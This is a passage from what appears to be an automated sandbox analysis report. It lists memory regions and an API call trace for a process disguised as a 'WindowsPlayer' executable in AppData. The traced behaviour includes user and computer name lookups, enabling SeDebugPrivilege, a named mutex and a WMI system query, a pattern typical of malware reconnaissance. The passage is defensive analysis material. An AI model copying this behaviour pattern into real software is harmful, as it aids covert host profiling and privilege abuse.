"c:\\windows\\system32\\appresolver.dll") Region: id = 2276 start_va = 0x7fffc3220000 end_va = 0x7fffc3279fff monitored = 0 entry_point = 0x7fffc32363c0 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 2277 start_va = 0x7fffc8d70000 end_va = 0x7fffc8d98fff monitored = 0 entry_point = 0x7fffc8d71bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 2278 start_va = 0x7fffc8d40000 end_va = 0x7fffc8d64fff monitored = 0 entry_point = 0x7fffc8d43920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2279 start_va = 0x750000 end_va = 0x753fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 2280 start_va = 0x2170000 end_va = 0x2181fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db") Region: id = 2281 start_va = 0x2190000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 2282 start_va = 0x7fffbe670000 end_va = 0x7fffbe6ecfff monitored = 0 entry_point = 0x7fffbe673a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 2283 start_va = 0x7fffc4a20000 end_va = 0x7fffc51b0fff monitored = 0 entry_point = 0x7fffc4a35f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 2297 start_va = 0x7fff48060000 end_va = 0x7fff4806ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48060000" filename = "" Region: id = 3138 start_va = 0x700000 end_va = 0x703fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 3139 start_va = 0x750000 end_va = 0x752fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 3140 start_va = 0x770000 end_va = 0x7e0fff monitored = 0 entry_point = 0x773d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 3141 start_va = 0x750000 end_va = 0x752fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 3142 start_va = 0x770000 end_va = 0x7e0fff monitored = 0 entry_point = 0x773d40 region_type = mapped_file name = "powershell.exe" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe") Region: id = 3143 start_va = 0x750000 end_va = 0x753fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 3144 start_va = 0x770000 end_va = 0x781fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.3.ver0x000000000000001b.db") Region: id = 3145 start_va = 0x790000 end_va = 0x793fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\OqXZRaykm\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 4002 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4003 start_va = 0x770000 end_va = 0x86ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 4004 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4005 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4006 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 4007 start_va = 0x7fffad970000 end_va = 0x7fffadb63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Drawing\\daba68776a7c26bc8eee56f012716bce\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.drawing\\daba68776a7c26bc8eee56f012716bce\\system.drawing.ni.dll") Region: id = 4008 start_va = 0x7fffcaa90000 end_va = 0x7fffcaba4fff monitored = 0 entry_point = 0x7fffcaaceb60 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4009 start_va = 0x1aca0000 end_va = 0x1ad9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aca0000" filename = "" Region: id = 4010 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4011 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 4012 start_va = 0x1aea0000 end_va = 0x1af9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001aea0000" filename = "" Region: id = 4013 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4014 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4015 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 4017 start_va = 0x1b2e0000 end_va = 0x1b3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b2e0000" filename = "" Region: id = 4018 start_va = 0x7fffa21f0000 end_va = 0x7fffa3295fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Windows.Forms\\2ff77c92ef5d149d33261c674c7ccfe4\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.windows.forms\\2ff77c92ef5d149d33261c674c7ccfe4\\system.windows.forms.ni.dll") Region: id = 4019 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4020 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 4021 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 4022 start_va = 0x7fff48070000 end_va = 0x7fff4807ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007fff48070000" filename = "" Region: id = 4023 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4024 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4025 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4026 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 4027 start_va = 0x1b580000 end_va = 0x1b62bfff monitored = 0 entry_point = 0x1b5fff10 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1_none_4b395a7b3c8e63ab\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1_none_4b395a7b3c8e63ab\\comctl32.dll") Region: id = 4028 start_va = 0x7fffbc450000 end_va = 0x7fffbc4fffff monitored = 0 entry_point = 0x7fffbc4cff10 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1_none_4b395a7b3c8e63ab\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1_none_4b395a7b3c8e63ab\\comctl32.dll") Region: id = 4029 start_va = 0x1b580000 end_va = 0x1b69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b580000" filename = "" Region: id = 4030 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4031 start_va = 0x1b580000 end_va = 0x1b661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001b580000" filename = "" Region: id = 4032 start_va = 0x1b690000 end_va = 0x1b69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b690000" filename = "" Region: id = 4033 start_va = 0x750000 end_va = 0x753fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 4034 start_va = 0x2170000 end_va = 0x2170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 4035 start_va = 0x2180000 end_va = 0x2186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 4036 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 4037 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 4066 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 4067 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 4068 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 4069 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 4070 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 4071 start_va = 0x21a0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 4072 start_va = 0x21b0000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 4073 start_va = 0x1b3e0000 end_va = 0x1b3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b3e0000" filename = "" Thread: id = 88 os_tid = 0xf0c [0187.937] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0188.131] RoInitialize () returned 0x1 [0188.132] RoUninitialize () returned 0x0 [0189.673] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x18b950, nSize=0x80 | out: lpBuffer="") returned 0x24 [0193.901] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x18ef90 | out: pfEnabled=0x18ef90) returned 0x0 [0194.243] GetUserNameW (in: lpBuffer=0x18b780, pcbBuffer=0x18baa8 | out: lpBuffer="OqXZRaykm", pcbBuffer=0x18baa8) returned 1 [0194.301] GetComputerNameW (in: lpBuffer=0x18b780, nSize=0x18baa8 | out: lpBuffer="PXTHFFRYO7", nSize=0x18baa8) returned 1 [0194.305] CoTaskMemAlloc (cb=0x20c) returned 0x610660 [0194.305] GetSystemDirectoryW (in: lpBuffer=0x610660, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0194.306] CoTaskMemFree (pv=0x610660) [0194.320] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a8d8 | out: phkResult=0x18a8d8*=0x0) returned 0x2 [0194.320] RegCloseKey (hKey=0xffffffff80000002) returned 0x0 [0194.383] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18b390, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0194.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18ba38) returned 1 [0194.387] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x18baa8, lpTotalNumberOfBytes=0x18baa0, lpTotalNumberOfFreeBytes=0x18ba98 | out: lpFreeBytesAvailableToCaller=0x18baa8, lpTotalNumberOfBytes=0x18baa0, lpTotalNumberOfFreeBytes=0x18ba98) returned 1 [0194.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18b9e8) returned 1 [0194.696] GetCurrentProcessId () returned 0x1518 [0194.782] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18aa80 | out: lpLuid=0x18aa80*(LowPart=0x14, HighPart=0)) returned 1 [0194.784] GetCurrentProcess () returned 0xffffffffffffffff [0194.784] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x18aa78 | out: TokenHandle=0x18aa78*=0xa0) returned 1 [0194.786] AdjustTokenPrivileges (in: TokenHandle=0xa0, DisableAllPrivileges=0, NewState=0x21e1388*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0194.787] CloseHandle (hObject=0xa0) returned 1 [0194.790] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1518) returned 0xa0 [0194.887] EnumProcessModules (in: hProcess=0xa0, lphModule=0x21e13f0, cb=0x200, lpcbNeeded=0x18ba60 | out: lphModule=0x21e13f0, lpcbNeeded=0x18ba60) returned 1 [0194.891] GetModuleInformation (in: hProcess=0xa0, hModule=0x10000, lpmodinfo=0x21e1660, cb=0x18 | out: lpmodinfo=0x21e1660*(lpBaseOfDll=0x10000, SizeOfImage=0x38000, EntryPoint=0x0)) returned 1 [0194.891] CoTaskMemAlloc (cb=0x804) returned 0x647700 [0194.892] GetModuleBaseNameW (in: hProcess=0xa0, hModule=0x10000, lpBaseName=0x647700, nSize=0x800 | out: lpBaseName="LIVE-WindowsPlayer-version-492b7f0827474659.exe") returned 0x2f [0194.893] CoTaskMemFree (pv=0x647700) [0194.893] CoTaskMemAlloc (cb=0x804) returned 0x647700 [0194.893] GetModuleFileNameExW (in: hProcess=0xa0, hModule=0x10000, lpFilename=0x647700, nSize=0x800 | out: lpFilename="C:\\Users\\OqXZRaykm\\AppData\\Roaming\\LIVE-WindowsPlayer-version-492b7f0827474659.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\roaming\\live-windowsplayer-version-492b7f0827474659.exe")) returned 0x52 [0194.894] CoTaskMemFree (pv=0x647700) [0194.896] CloseHandle (hObject=0xa0) returned 1 [0194.912] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="6NHmHkn9OEtCyHGw") returned 0xa0 [0196.703] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e8 [0196.707] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ec [0196.956] SetEvent (hEvent=0x2ec) returned 1 [0196.985] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18dd60*=0x2e8, lpdwindex=0x18db44 | out: lpdwindex=0x18db44) returned 0x0 [0197.345] CoGetContextToken (in: pToken=0x18dbb0 | out: pToken=0x18dbb0) returned 0x0 [0197.345] CoGetContextToken (in: pToken=0x18dab0 | out: pToken=0x18dab0) returned 0x0 [0197.345] WbemDefPath:IUnknown:QueryInterface (in: This=0x63aee0, riid=0x18dc10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x18dbe0 | out: ppvObject=0x18dbe0*=0x63aee0) returned 0x0 [0197.346] WbemDefPath:IUnknown:AddRef (This=0x63aee0) returned 0x3 [0197.346] WbemDefPath:IUnknown:Release (This=0x63aee0) returned 0x2 [0197.348] WbemDefPath:IWbemPath:SetText (This=0x63aee0, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0197.354] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18ef00 | out: puCount=0x18ef00*=0x2) returned 0x0 [0197.354] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18eef8*=0x0, pszText=0x0 | out: puBuffLength=0x18eef8*=0xf, pszText=0x0) returned 0x0 [0197.360] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18eef8*=0xf, pszText="00000000000000" | out: puBuffLength=0x18eef8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.809] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x18e2c8*=0x380, lpdwindex=0x18e054 | out: lpdwindex=0x18e054) returned 0x0 [0202.720] CoGetContextToken (in: pToken=0x18e010 | out: pToken=0x18e010) returned 0x0 [0202.720] CoGetContextToken (in: pToken=0x18df10 | out: pToken=0x18df10) returned 0x0 [0202.720] CoGetContextToken (in: pToken=0x18df10 | out: pToken=0x18df10) returned 0x0 [0202.721] CoGetContextToken (in: pToken=0x18de30 | out: pToken=0x18de30) returned 0x0 [0202.721] IUnknown:QueryInterface (in: This=0x61b170, riid=0x7fffa7d3e6f0*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18dcc8 | out: ppvObject=0x18dcc8*=0x61b190) returned 0x0 [0202.721] CObjectContext::ContextCallback () returned 0x0 [0202.810] IUnknown:Release (This=0x61b190) returned 0x1 [0202.811] CoUnmarshalInterface (in: pStm=0x665b50, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18df10 | out: ppv=0x18df10*=0x66bcf0) returned 0x0 [0202.812] CoMarshalInterface (pStm=0x665b50, riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnk=0x66bcf0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0) returned 0x0 [0202.813] WbemLocator:IUnknown:QueryInterface (in: This=0x66bcf0, riid=0x18e070*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x18e040 | out: ppvObject=0x18e040*=0x66e180) returned 0x0 [0202.814] WbemLocator:IUnknown:Release (This=0x66bcf0) returned 0x1 [0202.814] IWbemServices:ExecQuery (in: This=0x66e180, strQueryLanguage="WQL", strQuery="Select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x18e488 | out: ppEnum=0x18e488*=0x686db0) returned 0x0 [0202.839] IUnknown:QueryInterface (in: This=0x686db0, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e188 | out: ppvObject=0x18e188*=0x686db8) returned 0x0 [0202.839] IClientSecurity:QueryBlanket (in: This=0x686db8, pProxy=0x686db0, pAuthnSvc=0x18e250, pAuthzSvc=0x18e1d0, pServerPrincName=0x18e200, pAuthnLevel=0x18e1d4, pImpLevel=0x18e1dc, pAuthInfo=0x18e208, pCapabilites=0x18e1d8 | out: pAuthnSvc=0x18e250*=0xa, pAuthzSvc=0x18e1d0*=0x0, pServerPrincName=0x18e200, pAuthnLevel=0x18e1d4*=0x6, pImpLevel=0x18e1dc*=0x2, pAuthInfo=0x18e208, pCapabilites=0x18e1d8*=0x1) returned 0x0 [0202.839] IUnknown:Release (This=0x686db8) returned 0x1 [0202.839] IUnknown:QueryInterface (in: This=0x686db0, riid=0x7fffad19aed0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e120 | out: ppvObject=0x18e120*=0x6841f0) returned 0x0 [0202.839] IUnknown:QueryInterface (in: This=0x686db0, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18e130 | out: ppvObject=0x18e130*=0x686db8) returned 0x0 [0202.839] IClientSecurity:SetBlanket (This=0x686db8, pProxy=0x686db0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.991] IUnknown:Release (This=0x686db8) returned 0x2 [0202.991] WbemLocator:IUnknown:Release (This=0x6841f0) returned 0x1 [0202.991] CoTaskMemFree (pv=0x666330) [0202.991] IUnknown:AddRef (This=0x686db0) returned 0x2 [0202.992] CoGetContextToken (in: pToken=0x18d350 | out: pToken=0x18d350) returned 0x0 [0202.992] IUnknown:QueryInterface (in: This=0x61b048, riid=0x7fffa7cf3d28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d2c8 | out: ppvObject=0x18d2c8*=0x61b060) returned 0x0 [0202.992] IComThreadingInfo:GetCurrentApartmentType (in: This=0x61b060, pAptType=0x18d350 | out: pAptType=0x18d350*=3) returned 0x0 [0202.992] IUnknown:Release (This=0x61b060) returned 0x0 [0202.992] CoGetObjectContext (in: riid=0x7fffa7ce84b0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x666488 | out: ppv=0x666488*=0x61b048) returned 0x0 [0202.993] CoGetContextToken (in: pToken=0x18d7d0 | out: pToken=0x18d7d0) returned 0x0 [0202.993] IUnknown:QueryInterface (in: This=0x686db0, riid=0x7fffa7cf6958*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18d750 | out: ppvObject=0x18d750*=0x6841b8) returned 0x0 [0202.993] WbemLocator:IRpcOptions:Query (in: This=0x6841b8, pPrx=0x67c850, dwProperty=2, pdwValue=0x18d880 | out: pdwValue=0x18d880) returned 0x80004002 [0202.993] WbemLocator:IUnknown:Release (This=0x6841b8) returned 0x2 [0202.993] CoGetContextToken (in: pToken=0x18dea0 | out: pToken=0x18dea0) returned 0x0 [0202.993] CoGetContextToken (in: pToken=0x18dda0 | out: pToken=0x18dda0) returned 0x0 [0202.993] IUnknown:QueryInterface (in: This=0x686db0, riid=0x18df00*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x18dd20 | out: ppvObject=0x18dd20*=0x686db0) returned 0x0 [0202.993] IUnknown:Release (This=0x686db0) returned 0x2 [0202.993] WbemLocator:IUnknown:Release (This=0x66e180) returned 0x0 [0202.994] SysStringLen (param_1=0x0) returned 0x0 [0202.994] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x63aee0, puCount=0x18e4c0 | out: puCount=0x18e4c0*=0x2) returned 0x0 [0202.995] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18e4b8*=0x0, pszText=0x0 | out: puBuffLength=0x18e4b8*=0xf, pszText=0x0) returned 0x0 [0202.995] WbemDefPath:IWbemPath:GetText (in: This=0x63aee0, lFlags=4, puBuffLength=0x18e4b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x18e4b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.996] CoGetContextToken (in: pToken=0x18eab0 | out: pToken=0x18eab0) returned 0x0 [0202.996] IEnumWbemClassObject:Clone (in: This=0x686db0, ppEnum=0x18eeb0 | out: ppEnum=0x18eeb0*=0x6863b0) returned 0x0 [0203.620] IUnknown:QueryInterface (in: This=0x6863b0, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ec28 | out: ppvObject=0x18ec28*=0x6863b8) returned 0x0 [0203.621] IClientSecurity:QueryBlanket (in: This=0x6863b8, pProxy=0x6863b0, pAuthnSvc=0x18ecf0, pAuthzSvc=0x18ec70, pServerPrincName=0x18eca0, pAuthnLevel=0x18ec74, pImpLevel=0x18ec7c, pAuthInfo=0x18eca8, pCapabilites=0x18ec78 | out: pAuthnSvc=0x18ecf0*=0xa, pAuthzSvc=0x18ec70*=0x0, pServerPrincName=0x18eca0, pAuthnLevel=0x18ec74*=0x6, pImpLevel=0x18ec7c*=0x2, pAuthInfo=0x18eca8, pCapabilites=0x18ec78*=0x1) returned 0x0 [0203.621] IUnknown:Release (This=0x6863b8) returned 0x1 [0203.621] IUnknown:QueryInterface (in: This=0x6863b0, riid=0x7fffad19aed0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ebc0 | out: ppvObject=0x18ebc0*=0x66bcf0) returned 0x0 [0203.621] IUnknown:QueryInterface (in: This=0x6863b0, riid=0x7fffad19aee0*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ebd0 | out: ppvObject=0x18ebd0*=0x6863b8) returned 0x0 [0203.621] IClientSecurity:SetBlanket (This=0x6863b8, pProxy=0x6863b0, 